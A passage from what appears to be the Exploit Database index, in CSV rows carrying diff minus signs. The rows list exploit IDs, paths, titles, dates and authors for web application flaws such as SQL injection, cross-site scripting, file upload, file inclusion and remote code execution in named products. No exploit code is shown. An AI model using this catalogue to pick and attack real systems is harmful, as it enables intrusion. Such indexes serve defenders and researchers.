-35911,exploits/multiple/webapps/35911.txt,"jclassifiedsmanager - Multiple Vulnerabilities",2015-01-26,"Sarath Nair",multiple,webapps, -36313,exploits/php/webapps/36313.txt,"webERP 4.3.8 - Multiple Script URI Cross-Site Scripting Vulnerabilities",2011-11-17,"High-Tech Bridge SA",php,webapps, -35982,exploits/windows/webapps/35982.txt,"Hewlett-Packard (HP) UCMDB - JMX-Console Authentication Bypass",2015-02-03,"Hans-Martin Muench",windows,webapps,8080 -35988,exploits/php/webapps/35988.txt,"Support Incident Tracker (SiT!) 3.63 p1 - 'tasks.php?selected[]' SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps, -35989,exploits/php/webapps/35989.txt,"MBoard 1.3 - 'url' Open Redirection",2011-07-27,"High-Tech Bridge SA",php,webapps, -35990,exploits/php/webapps/35990.txt,"PHPJunkYard GBook 1.6/1.7 - Multiple Cross-Site Scripting Vulnerabilities",2011-07-27,"High-Tech Bridge SA",php,webapps, -35991,exploits/php/webapps/35991.txt,"Pragyan CMS 3.0 - SQL Injection",2015-02-04,"Steffen Rösemann",php,webapps,80 -35914,exploits/php/webapps/35914.txt,"ferretCMS 1.0.4-alpha - Multiple Vulnerabilities",2015-01-26,"Steffen Rösemann",php,webapps,80 -35915,exploits/multiple/webapps/35915.txt,"Symantec Data Center Security - Multiple Vulnerabilities",2015-01-26,"SEC Consult",multiple,webapps, -35916,exploits/php/webapps/35916.txt,"WordPress Plugin Photo Gallery 1.2.5 - Unrestricted Arbitrary File Upload",2014-11-11,"Kacper Szurek",php,webapps,80 -35922,exploits/php/webapps/35922.txt,"Joomla! Component com_jr_tfb - 'Controller' Local File Inclusion",2011-07-05,FL0RiX,php,webapps, -35923,exploits/asp/webapps/35923.txt,"Paliz Portal - Cross-Site Scripting / Multiple SQL Injections",2011-07-02,Net.Edit0r,asp,webapps, -35926,exploits/asp/webapps/35926.txt,"eTAWASOL - 'id' SQL Injection",2011-07-03,Bl4ck.Viper,asp,webapps, -35927,exploits/php/webapps/35927.txt,"Classified Script - c-BrowseClassified Cross-Site Scripting",2011-07-05,"Raghavendra Karthik D",php,webapps, -35929,exploits/php/webapps/35929.txt,"Joomla! Component com_voj - SQL Injection",2011-07-08,CoBRa_21,php,webapps, -35930,exploits/php/webapps/35930.txt,"Prontus CMS - 'page' Cross-Site Scripting",2011-07-11,Zerial,php,webapps, -35931,exploits/php/webapps/35931.txt,"ICMusic 1.2 - 'music_id' SQL Injection",2011-07-11,kaMtiEz,php,webapps, -35933,exploits/hardware/webapps/35933.txt,"ManageEngine Firewall Analyzer 8.0 - Directory Traversal / Cross-Site Scripting",2015-01-29,"Sepahan TelCom IT Group",hardware,webapps, -35940,exploits/php/webapps/35940.txt,"Sphider 1.3.x - Admin Panel Multiple SQL Injections",2011-07-12,"Karthik R",php,webapps, -35941,exploits/multiple/webapps/35941.txt,"Flowplayer 3.2.7 - 'linkUrl' Cross-Site Scripting",2011-07-12,"Szymon Gruszecki",multiple,webapps, -35942,exploits/php/webapps/35942.txt,"TCExam 11.2.x - Multiple Cross-Site Scripting Vulnerabilities",2011-07-13,"Gjoko Krstic",php,webapps, -35943,exploits/php/webapps/35943.txt,"Chyrp 2.x - '/admin/help.php' Multiple Cross-Site Scripting Vulnerabilities",2011-07-13,Wireghoul,php,webapps, -35944,exploits/php/webapps/35944.txt,"Chyrp 2.x - '/includes/JavaScript.php?action' Cross-Site Scripting",2011-07-13,Wireghoul,php,webapps, -35945,exploits/php/webapps/35945.txt,"Chyrp 2.x - 'action' Traversal Local File Inclusion",2011-07-29,Wireghoul,php,webapps, -35946,exploits/php/webapps/35946.txt,"Chyrp 2.x - '/includes/lib/gz.php?File' Traversal Arbitrary File Access",2011-07-29,Wireghoul,php,webapps, -35947,exploits/php/webapps/35947.txt,"Chyrp 2.x swfupload Extension - 'upload_handler.php' Arbitrary File Upload / Arbitrary PHP Code Execution",2011-07-29,Wireghoul,php,webapps, -35950,exploits/php/webapps/35950.txt,"NPDS CMS REvolution-13 - SQL Injection",2015-01-24,"Narendra Bhati",php,webapps,80 -35954,exploits/php/webapps/35954.txt,"Auto Web Toolbox - 'id' SQL Injection",2011-07-15,Lazmania61,php,webapps, -35955,exploits/php/webapps/35955.txt,"Easy Estate Rental - 's_location' SQL Injection",2011-07-15,Lazmania61,php,webapps, -35956,exploits/php/webapps/35956.txt,"Joomla! Component Foto - 'id_categoria' SQL Injection",2011-07-15,SOLVER,php,webapps, -35958,exploits/php/webapps/35958.txt,"Joomla! Component Juicy Gallery - 'picId' SQL Injection",2011-07-15,SOLVER,php,webapps, -35959,exploits/php/webapps/35959.txt,"Joomla! Component com_hospital - SQL Injection",2011-07-15,SOLVER,php,webapps, -35960,exploits/php/webapps/35960.txt,"Joomla! Component Controller - 'Itemid' SQL Injection",2011-07-15,SOLVER,php,webapps, -35987,exploits/php/webapps/35987.txt,"Support Incident Tracker (SiT!) 3.63 p1 - 'search.php?search_string' SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps, -35966,exploits/php/webapps/35966.txt,"Joomla! Component com_newssearch - SQL Injection",2011-07-15,"Robert Cooper",php,webapps, -35967,exploits/php/webapps/35967.txt,"AJ Classifieds - 'listingid' SQL Injection",2011-07-15,Lazmania61,php,webapps, -35968,exploits/php/webapps/35968.txt,"BlueSoft (Multiple Products) - Multiple SQL Injections",2011-07-18,Lazmania61,php,webapps, -35969,exploits/php/webapps/35969.txt,"BlueSoft Social Networking CMS - SQL Injection",2011-07-17,Lazmania61,php,webapps, -35971,exploits/php/webapps/35971.txt,"WordPress Plugin bSuite 4.0.7 - Multiple HTML Injection Vulnerabilities",2011-07-11,IHTeam,php,webapps, -35972,exploits/php/webapps/35972.txt,"Sefrengo CMS 1.6.1 - Multiple SQL Injections",2015-02-02,"ITAS Team",php,webapps, -35973,exploits/php/webapps/35973.txt,"Joomla! < 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-07-20,"YGN Ethical Hacker Group",php,webapps, -35974,exploits/php/webapps/35974.txt,"Tiki Wiki CMS Groupware 7.2 - 'snarf_ajax.php' Cross-Site Scripting",2011-07-20,"High-Tech Bridge SA",php,webapps, -35975,exploits/php/webapps/35975.txt,"Cyberoam UTM - Multiple Cross-Site Scripting Vulnerabilities",2011-07-20,"Patrick Webster",php,webapps, -35976,exploits/php/webapps/35976.txt,"Synergy Software - 'id' SQL Injection",2011-07-21,Ehsan_Hp200,php,webapps, -35977,exploits/php/webapps/35977.txt,"Godly Forums - 'id' SQL Injection",2011-07-25,3spi0n,php,webapps, -35978,exploits/php/webapps/35978.txt,"Online Grades 3.2.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-07-25,"Gjoko Krstic",php,webapps, -35979,exploits/php/webapps/35979.txt,"Willscript Recipes Website Script Silver Edition - 'viewRecipe.php' SQL Injection",2011-07-25,Lazmania61,php,webapps, -36040,exploits/php/webapps/36040.txt,"Chamilo LMS 1.9.8 - Blind SQL Injection",2015-02-09,"Kacper Szurek",php,webapps,80 -36000,exploits/php/webapps/36000.txt,"HP Network Automation 9.10 - SQL Injection",2011-07-28,anonymous,php,webapps, -36001,exploits/asp/webapps/36001.txt,"Sitecore CMS 6.4.1 - 'url' Open Redirection",2011-07-28,"Tom Neaves",asp,webapps, -36002,exploits/jsp/webapps/36002.txt,"IBM Tivoli Service Automation Manager 7.2.4 - Remote Code Execution",2014-12-12,"Jakub Palaczynski",jsp,webapps, -36003,exploits/php/webapps/36003.txt,"Curverider Elgg 1.7.9 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-01,"Aung Khant",php,webapps, -36005,exploits/php/webapps/36005.txt,"MyBB MyTabs Plugin - 'tab' SQL Injection",2011-08-02,"AutoRUN & dR.sqL",php,webapps, -36008,exploits/php/webapps/36008.txt,"Gilnet News - 'read_more.php' SQL Injection",2011-07-11,Err0R,php,webapps, -36009,exploits/php/webapps/36009.txt,"mt LinkDatenbank - 'b' Cross-Site Scripting",2011-08-03,Err0R,php,webapps, -36010,exploits/asp/webapps/36010.txt,"BESNI OKUL PORTAL - 'sayfa.asp' Cross-Site Scripting",2011-08-03,Err0R,asp,webapps, -36011,exploits/asp/webapps/36011.txt,"Ataccan E-Ticaret Scripti - 'id' SQL Injection",2011-08-03,Err0R,asp,webapps, -36012,exploits/php/webapps/36012.txt,"Joomla! Component com_xeslidegalfx - 'id' SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps, -36015,exploits/php/webapps/36015.txt,"Joomla! Component com_community - 'userid' SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps, -36017,exploits/php/webapps/36017.txt,"HESK 2.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-03,"High-Tech Bridge SA",php,webapps, -36018,exploits/php/webapps/36018.txt,"WordPress Plugin WP E-Commerce 3.8.6 - 'cart_messages[]' Cross-Site Scripting",2011-08-04,"High-Tech Bridge SA",php,webapps, -36019,exploits/asp/webapps/36019.txt,"Community Server 2007/2008 - 'TagSelector.aspx' Cross-Site Scripting",2011-08-04,PontoSec,asp,webapps, -36041,exploits/php/webapps/36041.txt,"Fork CMS 3.8.5 - SQL Injection",2015-02-09,"Sven Schleier",php,webapps,80 -36023,exploits/php/webapps/36023.txt,"RedaxScript CMS 2.2.0 - SQL Injection",2015-02-09,"ITAS Team",php,webapps, -36059,exploits/php/webapps/36059.txt,"Exponent CMS 2.3.1 - Multiple Cross-Site Scripting Vulnerabilities",2015-02-12,"Mayuresh Dani",php,webapps,80 -36026,exploits/php/webapps/36026.txt,"u5CMS 3.9.3 - 'deletefile.php' Arbitrary File Deletion",2015-02-09,LiquidWorm,php,webapps, -36027,exploits/php/webapps/36027.txt,"u5CMS 3.9.3 - Multiple SQL Injections",2015-02-09,LiquidWorm,php,webapps, -36028,exploits/php/webapps/36028.txt,"u5CMS 3.9.3 - 'thumb.php' Local File Inclusion",2015-02-09,LiquidWorm,php,webapps, -36029,exploits/php/webapps/36029.txt,"u5CMS 3.9.3 - Multiple Persistent Cross-Site Scripting / Reflected Cross-Site Scripting Vulnerabilities",2015-02-09,LiquidWorm,php,webapps, -36031,exploits/php/webapps/36031.txt,"StaMPi - Local File Inclusion",2015-02-09,"e . V . E . L",php,webapps, -36058,exploits/php/webapps/36058.txt,"WordPress Plugin Video Gallery 2.7.0 - SQL Injection",2015-02-12,"Claudio Viviani",php,webapps, -36032,exploits/php/webapps/36032.txt,"Softbiz Recipes Portal Script - Multiple Cross-Site Scripting Vulnerabilities",2011-08-05,Net.Edit0r,php,webapps, -36033,exploits/php/webapps/36033.txt,"Search Network 2.0 - 'query' Cross-Site Scripting",2011-08-08,darkTR,php,webapps, -36034,exploits/php/webapps/36034.txt,"OpenEMR 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-09,"Houssam Sahli",php,webapps, -36035,exploits/php/webapps/36035.txt,"BlueSoft Banner Exchange - 'referer_id' SQL Injection",2011-08-08,darkTR,php,webapps, -36036,exploits/php/webapps/36036.txt,"BlueSoft Rate My Photo Site - 'ty' SQL Injection",2011-08-08,darkTR,php,webapps, -36038,exploits/php/webapps/36038.txt,"WordPress Plugin eShop 6.2.8 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-10,"High-Tech Bridge SA",php,webapps, -39386,exploits/php/webapps/39386.txt,"iScripts EasyCreate 3.0 - Multiple Vulnerabilities",2016-02-01,"Bikramaditya Guha",php,webapps,80 -36042,exploits/hardware/webapps/36042.txt,"LG DVR LE6016D - Remote File Disclosure",2015-02-10,"Yakir Wizman",hardware,webapps, -36043,exploits/php/webapps/36043.rb,"WordPress Plugin WP EasyCart - Unrestricted Arbitrary File Upload (Metasploit)",2015-02-10,Metasploit,php,webapps,80 -36044,exploits/php/webapps/36044.txt,"PHP Flat File Guestbook 1.0 - 'ffgb_admin.php' Remote File Inclusion",2011-08-11,"RiRes Walid",php,webapps, -36046,exploits/php/webapps/36046.txt,"phpWebSite - 'page_id' Cross-Site Scripting",2011-08-17,Ehsan_Hp200,php,webapps, -36047,exploits/php/webapps/36047.txt,"awiki 20100125 - Multiple Local File Inclusions",2011-08-15,muuratsalo,php,webapps, -36048,exploits/php/webapps/36048.txt,"phpList 2.10.x - Security Bypass / Information Disclosure",2011-08-15,"Davide Canali",php,webapps, -36050,exploits/php/webapps/36050.txt,"WordPress Plugin Fast Secure Contact Form 3.0.3.1 - 'index.php' Cross-Site Scripting",2011-08-17,"High-Tech Bridge SA",php,webapps, -36051,exploits/php/webapps/36051.txt,"WordPress Plugin WP-Stats-Dashboard 2.6.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-17,"High-Tech Bridge SA",php,webapps, -36054,exploits/php/webapps/36054.txt,"WordPress Plugin Survey and Poll 1.1 - Blind SQL Injection",2015-02-11,"Securely (Yoo Hee man)",php,webapps,80 -36055,exploits/php/webapps/36055.txt,"Pandora FMS 5.1 SP1 - SQL Injection",2015-02-11,Vulnerability-Lab,php,webapps,8080 -36057,exploits/cgi/webapps/36057.txt,"IBM Endpoint Manager - Persistent Cross-Site Scripting",2015-02-11,"RedTeam Pentesting",cgi,webapps,52311 -36061,exploits/php/webapps/36061.php,"WordPress Plugin Webdorado Spider Event Calendar 1.4.9 - SQL Injection",2015-02-13,"Mateusz Lach",php,webapps, -36063,exploits/asp/webapps/36063.txt,"Code Widgets Online Job Application - 'admin.asp' Multiple SQL Injections",2011-08-17,"L0rd CrusAd3r",asp,webapps, -36064,exploits/asp/webapps/36064.txt,"Code Widgets DataBound Index Style Menu - 'category.asp' SQL Injection",2011-08-17,Inj3ct0r,asp,webapps, -36065,exploits/asp/webapps/36065.txt,"Code Widgets DataBound Collapsible Menu - 'main.asp' SQL Injection",2011-08-17,Inj3ct0r,asp,webapps, -36066,exploits/asp/webapps/36066.txt,"Code Widgets Multiple Question - Multiple Choice Online Questionnaire SQL Injections",2011-08-17,"L0rd CrusAd3r",asp,webapps, -36067,exploits/cfm/webapps/36067.txt,"Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting",2011-08-18,G.R0b1n,cfm,webapps, -36068,exploits/php/webapps/36068.txt,"MantisBT 1.1.8 - Cross-Site Scripting / SQL Injection",2011-08-18,Net.Edit0r,php,webapps, -36072,exploits/php/webapps/36072.txt,"OneFileCMS 1.1.1 - 'onefilecms.php' Cross-Site Scripting",2011-08-21,mr.pr0n,php,webapps, -36073,exploits/php/webapps/36073.txt,"Pandora FMS 3.x - 'index.php' Cross-Site Scripting",2011-08-22,"mehdi boukazoula",php,webapps, -36074,exploits/php/webapps/36074.txt,"TotalShopUK 1.7.2 - 'index.php' SQL Injection",2011-08-22,"Eyup CELIK",php,webapps, -36076,exploits/php/webapps/36076.txt,"Concrete 5.4.1 1 - 'rcID' Cross-Site Scripting",2011-08-22,"Aung Khant",php,webapps, -36077,exploits/php/webapps/36077.txt,"Open Classifieds 1.7.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-23,"Yassin Aboukir",php,webapps, -36079,exploits/php/webapps/36079.txt,"CommodityRentals Real Estate Script - 'txtsearch' HTML Injection",2011-08-24,"Eyup CELIK",php,webapps, -36080,exploits/php/webapps/36080.txt,"Tourismscripts Hotel Portal - 'hotel_city' HTML Injection",2011-08-24,"Eyup CELIK",php,webapps, -36081,exploits/php/webapps/36081.txt,"VicBlog - 'tag' SQL Injection",2011-08-24,"Eyup CELIK",php,webapps, -36082,exploits/php/webapps/36082.pl,"Zazavi 1.2.1 - '/FileManager/Controller.php' Arbitrary File Upload",2011-08-25,KedAns-Dz,php,webapps, -36083,exploits/php/webapps/36083.txt,"Simple Machines Forum (SMF) 1.1.14/2.0 - '[img]' BBCode Tag Cross-Site Request Forgery",2011-08-25,"Christian Yerena",php,webapps, -36084,exploits/php/webapps/36084.html,"Mambo 4.6.5 - 'index.php' Cross-Site Request Forgery",2011-08-26,Caddy-Dz,php,webapps, -36085,exploits/php/webapps/36085.txt,"phpWebSite 1.7.1 - 'mod.php' SQL Injection",2011-08-27,Ehsan_Hp200,php,webapps, -36086,exploits/php/webapps/36086.txt,"WordPress Plugin WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting",2015-02-16,"Kacper Szurek",php,webapps, -36087,exploits/php/webapps/36087.txt,"WordPress Plugin Fancybox 3.0.2 - Persistent Cross-Site Scripting",2015-02-16,NULLpOint7r,php,webapps, -36089,exploits/php/webapps/36089.txt,"eTouch SamePage 4.4.0.0.239 - Multiple Vulnerabilities",2015-02-16,"Brandon Perry",php,webapps,80 -36090,exploits/php/webapps/36090.txt,"ClickCMS - Denial of Service / CAPTCHA Bypass",2011-08-29,MustLive,php,webapps, -36091,exploits/php/webapps/36091.txt,"IBM Open Admin Tool 2.71 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-30,"Sumit Kumar Soni",php,webapps, -36093,exploits/php/webapps/36093.txt,"CS-Cart 2.2.1 - 'products.php' SQL Injection",2011-08-30,Net.Edit0r,php,webapps, -36094,exploits/php/webapps/36094.txt,"TinyWebGallery 1.8.4 - Local File Inclusion / SQL Injection",2011-08-31,KedAns-Dz,php,webapps, -36095,exploits/php/webapps/36095.txt,"S9Y Serendipity 1.5.1 - 'research_display.php' SQL Injection",2011-08-31,The_Exploited,php,webapps, -36096,exploits/php/webapps/36096.txt,"Web Professional - 'default.php' SQL Injection",2011-08-31,The_Exploited,php,webapps, -36097,exploits/php/webapps/36097.txt,"Mambo Component N-Skyrslur - Cross-Site Scripting",2011-09-02,CoBRa_21,php,webapps, -36098,exploits/php/webapps/36098.html,"Guppy CMS 5.0.9/5.00.10 - Authentication Bypass/Change Email",2015-02-17,"Brandon Murphy",php,webapps,80 -36099,exploits/php/webapps/36099.html,"GuppY CMS 5.0.9 < 5.00.10 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-02-17,"Brandon Murphy",php,webapps,80 -36102,exploits/php/webapps/36102.txt,"Mambo Component N-Gallery - SQL Injection",2011-09-02,CoBRa_21,php,webapps, -36103,exploits/php/webapps/36103.txt,"Mambo Component Ahsshop - SQL Injection",2011-09-02,CoBRa_21,php,webapps, -36105,exploits/hardware/webapps/36105.sh,"D-Link DSL-2640B ADSL Router - 'ddnsmngr' Unauthenticated Remote DNS Change",2015-02-18,"Todor Donev",hardware,webapps, -36106,exploits/php/webapps/36106.txt,"Mambo Component N-Press - SQL Injection",2011-09-02,CoBRa_21,php,webapps, -36107,exploits/php/webapps/36107.txt,"KaiBB 2.0.1 - SQL Injection / Arbitrary File Upload",2011-09-02,KedAns-Dz,php,webapps, -36108,exploits/php/webapps/36108.txt,"Mambo Component N-Frettir - SQL Injection",2011-09-02,CoBRa_21,php,webapps, -36109,exploits/php/webapps/36109.txt,"Mambo Component N-Myndir - SQL Injection",2011-09-02,CoBRa_21,php,webapps, -36110,exploits/php/webapps/36110.txt,"ACal 2.2.6 - 'calendar.php' Cross-Site Scripting",2011-09-02,T0xic,php,webapps, -36112,exploits/php/webapps/36112.txt,"WordPress Plugin Duplicator 0.5.8 - Privilege Escalation",2015-02-18,"Kacper Szurek",php,webapps,80 -36113,exploits/php/webapps/36113.txt,"Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting",2011-09-05,R3d-D3V!L,php,webapps, -36114,exploits/php/webapps/36114.txt,"EasyGallery 5 - 'index.php' Multiple SQL Injections",2011-09-05,"Eyup CELIK",php,webapps, -36116,exploits/asp/webapps/36116.txt,"Kisanji - 'gr' Cross-Site Scripting",2011-09-06,Bl4ck.Viper,asp,webapps, -36117,exploits/php/webapps/36117.txt,"GeoClassifieds Lite 2.0.x - Multiple Cross-Site Scripting / SQL Injections",2011-09-06,"Yassin Aboukir",php,webapps, -36121,exploits/php/webapps/36121.txt,"Zikula Application Framework 1.2.7/1.3 - 'themename' Cross-Site Scripting",2011-09-05,"High-Tech Bridge SA",php,webapps, -36122,exploits/php/webapps/36122.txt,"SkaDate - 'blogs.php' Cross-Site Scripting",2011-09-08,sonyy,php,webapps, -36123,exploits/php/webapps/36123.txt,"In-link 2.3.4/5.1.3 RC1 - 'cat' SQL Injection",2011-09-08,SubhashDasyam,php,webapps, -36126,exploits/multiple/webapps/36126.txt,"CrushFTP 7.2.0 - Multiple Vulnerabilities",2015-02-19,"Rehan Ahmed",multiple,webapps,8080 -36127,exploits/php/webapps/36127.txt,"Piwigo 2.7.3 - Multiple Vulnerabilities",2015-02-19,"Steffen Rösemann",php,webapps,80 -36129,exploits/php/webapps/36129.txt,"Pluck CMS 4.7 - Multiple Local File Inclusion / File Disclosure Vulnerabilities",2011-09-08,Bl4k3,php,webapps, -36131,exploits/php/webapps/36131.txt,"Papoo CMS Light 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-12,"Stefan Schurtz",php,webapps, -36132,exploits/xml/webapps/36132.txt,"Pentaho < 4.5.0 - User Console XML Injection",2015-02-20,"K.d Long",xml,webapps, -36133,exploits/asp/webapps/36133.txt,"Orion Network Performance Monitor 10.1.3 - 'CustomChart.aspx' Cross-Site Scripting",2011-09-12,"Gustavo Roberto",asp,webapps, -36134,exploits/asp/webapps/36134.txt,"Microsoft SharePoint 2007/2010 - 'Source' Multiple Open Redirections",2011-09-14,"Irene Abezgauz",asp,webapps, -36135,exploits/php/webapps/36135.txt,"WordPress Plugin Auctions 1.8.8 - 'wpa_id' SQL Injection",2011-09-14,sherl0ck_,php,webapps, -36136,exploits/php/webapps/36136.txt,"StarDevelop LiveHelp 2.0 - 'index.php' Local File Inclusion",2011-09-15,KedAns-Dz,php,webapps, -36137,exploits/php/webapps/36137.txt,"PunBB 1.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-16,"Piotr Duszynski",php,webapps, -36138,exploits/asp/webapps/36138.txt,"ASP Basit Haber Script 1.0 - 'id' SQL Injection",2011-09-18,m3rciL3Ss,asp,webapps, -36139,exploits/asp/webapps/36139.txt,"Ay Computer (Multiple Products) - Multiple SQL Injections",2011-09-17,m3rciL3Ss,asp,webapps, -36140,exploits/php/webapps/36140.txt,"Toko Lite CMS 1.5.2 - HTTP Response Splitting / Cross-Site Scripting",2011-09-19,"Gjoko Krstic",php,webapps, -36141,exploits/asp/webapps/36141.txt,"Aspgwy Access 1.0 - 'matchword' Cross-Site Scripting",2011-09-19,"kurdish hackers team",asp,webapps, -36142,exploits/php/webapps/36142.txt,"net4visions (Multiple Products) - 'dir' Multiple Cross-Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps, -36144,exploits/php/webapps/36144.txt,"Card sharj 1.0 - Multiple SQL Injections",2011-09-19,Net.Edit0r,php,webapps, -36146,exploits/asp/webapps/36146.txt,"i-Gallery 3.4 - 'd' Cross-Site Scripting",2011-09-21,Kurd-Team,asp,webapps, -36147,exploits/php/webapps/36147.txt,"Free Help Desk 1.1b - Multiple Input Validation Vulnerabilities",2011-09-06,"High-Tech Bridge SA",php,webapps, -36148,exploits/php/webapps/36148.txt,"phpRS 2.8.1 - Multiple SQL Injections / Cross-Site Scripting",2011-09-18,iM4n,php,webapps, -36149,exploits/php/webapps/36149.txt,"OneCMS 2.6.4 - Multiple SQL Injections",2011-09-21,"kurdish hackers team",php,webapps, -36150,exploits/php/webapps/36150.txt,"Zyncro 3.0.1.20 - Multiple HTML Injection Vulnerabilities",2011-09-22,"Ferran Pichel Llaquet",php,webapps, -36151,exploits/php/webapps/36151.txt,"Zyncro 3.0.1.20 - Social Network Message Menu SQL Injection",2011-09-22,"Ferran Pichel Llaquet",php,webapps, -36154,exploits/php/webapps/36154.txt,"Beehive Forum 1.4.4 - Persistent Cross-Site Scripting",2015-02-23,"Halil Dalabasmaz",php,webapps, -36155,exploits/php/webapps/36155.php,"WeBid 1.1.1 - Unrestricted Arbitrary File Upload",2015-02-23,"CWH Underground",php,webapps,80 -36156,exploits/php/webapps/36156.txt,"Clipbucket 2.7 RC3 0.9 - Blind SQL Injection",2015-02-23,"CWH Underground",php,webapps,80 -36157,exploits/php/webapps/36157.rb,"Zabbix 2.0.5 - Cleartext ldap_bind_Password Password Disclosure (Metasploit)",2015-02-23,"Pablo González",php,webapps,80 -36159,exploits/php/webapps/36159.txt,"Zeuscart 4.0 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80 -36160,exploits/php/webapps/36160.txt,"phpBugTracker 1.6.0 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80 -36161,exploits/php/webapps/36161.txt,"WordPress Plugin Easy Social Icons 1.2.2 - Cross-Site Request Forgery",2015-02-23,"Eric Flokstra",php,webapps,80 -36162,exploits/php/webapps/36162.txt,"TWiki 5.0.2 - '/bin/view/Main/Jump?newtopic' Cross-Site Scripting",2011-09-22,"Mesut Timur",php,webapps, -36163,exploits/php/webapps/36163.txt,"TWiki 5.0.2 SlideShowPlugin - Slide Show Pages URI Cross-Site Scripting",2011-09-22,"Mesut Timur",php,webapps, -36164,exploits/php/webapps/36164.txt,"AWStats 6.95/7.0 - 'awredir.pl' Multiple Cross-Site Scripting Vulnerabilities",2011-09-22,MustLive,php,webapps, -36165,exploits/php/webapps/36165.txt,"IceWarp Mail Server 10.3.2 server/webmail.php Soap Message Parsing - Arbitrary File Disclosure",2011-09-24,"David Kirkpatrick",php,webapps, -36166,exploits/php/webapps/36166.txt,"WordPress Plugin BuddyPress 1.2.10 / WordPress Theme DEV Blogs Mu 1.2.6 (WordPress 3.1.4) - Regular Subscriber HTML Injection",2011-09-26,knull,php,webapps, -36167,exploits/php/webapps/36167.txt,"AdaptCMS 2.0.1 - Cross-Site Scripting / Information Disclosure",2011-09-26,"Stefan Schurtz",php,webapps, -36168,exploits/php/webapps/36168.txt,"S9Y Serendipity Freetag-plugin 3.23 - 'serendipity[tagview]' Cross-Site Scripting",2011-09-26,"Stefan Schurtz",php,webapps, -36171,exploits/php/webapps/36171.txt,"Joomla! Component Biitatemplateshop - 'groups' SQL Injection",2011-09-26,"BHG Security Group",php,webapps, -36172,exploits/cfm/webapps/36172.txt,"Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-27,MustLive,cfm,webapps, -36173,exploits/php/webapps/36173.txt,"Vanira CMS - 'vtpidshow' SQL Injection",2011-09-27,"kurdish hackers team",php,webapps, -36175,exploits/php/webapps/36175.txt,"Traq 2.2 - Multiple SQL Injections / Cross-Site Scripting",2011-09-28,"High-Tech Bridge SA",php,webapps, -36176,exploits/php/webapps/36176.txt,"Joomla! < 1.7.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-29,"Aung Khant",php,webapps, -36177,exploits/php/webapps/36177.txt,"Bitweaver 2.8.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-29,"Stefan Schurtz",php,webapps, -36178,exploits/php/webapps/36178.txt,"WordPress Theme Atahualpa 3.6.7 - 's' Cross-Site Scripting",2011-09-29,SiteWatch,php,webapps, -36179,exploits/php/webapps/36179.txt,"WordPress Theme Hybrid 0.9 - 'cpage' Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps, -36180,exploits/php/webapps/36180.txt,"WordPress Theme F8 Lite 4.2.1 - 's' Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps, -36181,exploits/php/webapps/36181.txt,"WordPress Theme Elegant Grunge 1.0.3 - 's' Cross-Site Scripting",2011-09-29,SiteWatch,php,webapps, -36182,exploits/php/webapps/36182.txt,"WordPress Theme EvoLve 1.2.5 - 's' Cross-Site Scripting",2011-09-29,SiteWatch,php,webapps, -36183,exploits/php/webapps/36183.txt,"WordPress Theme Cover WP 1.6.5 - 's' Cross-Site Scripting",2011-09-24,jabdah,php,webapps, -36184,exploits/php/webapps/36184.txt,"WordPress Theme Web Minimalist 1.1 - 'index.php' Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps, -36185,exploits/php/webapps/36185.txt,"WordPress Theme Pixiv Custom Theme 2.1.5 - 'cpage' Cross-Site Scripting",2011-09-29,SiteWatch,php,webapps, -36186,exploits/php/webapps/36186.txt,"WordPress Theme Morning Coffee 3.5 - 'index.php' Cross-Site Scripting",2011-09-30,SiteWatch,php,webapps, -36187,exploits/php/webapps/36187.txt,"WordPress Theme Black-LetterHead 1.5 - 'index.php' Cross-Site Scripting",2011-09-30,SiteWatch,php,webapps, -36191,exploits/php/webapps/36191.txt,"WordPress Theme RedLine 1.65 - 's' Cross-Site Scripting",2011-09-30,SiteWatch,php,webapps, -36192,exploits/php/webapps/36192.txt,"A2CMS - 'index.php' Local File Disclosure",2011-09-28,St493r,php,webapps, -36193,exploits/php/webapps/36193.txt,"WordPress Plugin WP Bannerize 2.8.7 - 'ajax_sorter.php' SQL Injection",2011-09-30,"Miroslav Stampar",php,webapps, -36194,exploits/php/webapps/36194.txt,"ProjectForum 7.0.1 3038 - 'more' Object HTML Injection",2011-09-30,"Paul Davis",php,webapps, -36195,exploits/php/webapps/36195.txt,"WordPress Theme Trending 0.1 - 'cpage' Cross-Site Scripting",2011-09-24,SiteWatch,php,webapps, -36196,exploits/php/webapps/36196.txt,"SonicWALL Viewpoint 6.0 - 'scheduleID' SQL Injection",2011-10-02,Rem0ve,php,webapps, -36197,exploits/php/webapps/36197.txt,"ezCourses - 'admin.asp' Security Bypass",2011-10-01,J.O,php,webapps, -36200,exploits/php/webapps/36200.txt,"Netvolution 2.5.8 - 'referer' Header SQL Injection",2011-10-03,"Patroklos Argyroudis",php,webapps, -36201,exploits/php/webapps/36201.txt,"Phorum 5.2.18 - '/admin/index.php' Cross-Site Scripting",2011-10-03,"Stefan Schurtz",php,webapps, -36202,exploits/hardware/webapps/36202.py,"Seagate Business NAS 2014.00319 - Unauthenticated Remote Code Execution",2015-03-01,"OJ Reeves",hardware,webapps,80 -36203,exploits/php/webapps/36203.txt,"vTiger CRM 